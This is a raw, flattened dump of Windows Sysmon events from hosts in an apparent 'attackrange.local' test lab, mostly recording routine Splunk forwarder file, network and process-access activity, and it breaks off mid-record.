Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:20.435{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF3BA5032ED5FA998CD2082AFC9FB6B,SHA256=99982258B566D464D7F42514A4B9402A19089DFC11F6C9B2793DED00AA8A9682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:20.021{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1515C2EB77F2597579807554B35BAD5,SHA256=DD95CAB48C0C66F457383383CC7D9063EEF93A49B3663694F202045B7DF36933,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:18.288{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57495-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:21.482{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DA6727C4BF8698443A34D3990519445,SHA256=035DB784F70CF8FBE2A46772D4742719E39865E7A9B975BA8B11A53FD0C93E00,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:13.578{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62008-false10.0.1.12-8000- 23542300x80000000000000001055514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:21.038{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81D2BCFDADE12C5539C9E80D8CECB731,SHA256=023FE9F40E6D2F1A73ADCC3E34312D1FDA0B5F9B0F9B261FA4291F7F2BE9B45B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:22.514{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86164600D55B235F6C694ED161847716,SHA256=6FCC3E1044D5014AB0F0C48354515A435179767BB7B79B367EA16119E126D95A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:22.054{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E011149FF4242150EF283D59A4DB3C9C,SHA256=64A6F6E50542BFAC13C71111EA1E5CD905A34A89726EB0EB0717081815084722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:23.826{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF384C1F253C934175EDE2457607C89E,SHA256=99FF886ACA90F77B3D48C00E1FA70724D91D8A14CC41EC11ABF716C8AA53ACD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:23.826{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1AAB564721D6EF7704F7D48944815EE,SHA256=023378C4B95A7858F932DFC20D45699167CF88526A5E8C26C02C3A19441CB360,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:23.530{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73200AC24DAAC8161706881B10DA8154,SHA256=DB3763FCB868DC189BED5BBEA84DAF887445D2D3E0B4491463995FEAC7FFBFD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:23.070{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65CC6E06D1E0487E225E1444EFCC5D5E,SHA256=824A47DBF28FB11F13694B1BD783EE1596690FD7A5A65136796A405330DD1610,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:21.053{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57496-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000810830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F0-60EB-F279-00000000D001}1656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F8F0-60EB-F279-00000000D001}1656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F0-60EB-F279-00000000D001}1656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.952{0C1E0330-F8F0-60EB-F279-00000000D001}1656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.576{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BDB5FDDDCE5635ADC4AF7171E697075,SHA256=56693F098BD866633E11487A7F4B05B6DDB6D193BD5DC908CBF3DE14599721A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:24.085{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=667860EB182DE6CC63C0383016134F19,SHA256=AECD81CC681C5C2FEBAA5F214A1BE4F695B6B6836067240643F1839C9F915CCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.435{0C1E0330-F8F0-60EB-F179-00000000D001}1721892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000810815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:22.299{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-24168-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000810814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F0-60EB-F179-00000000D001}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 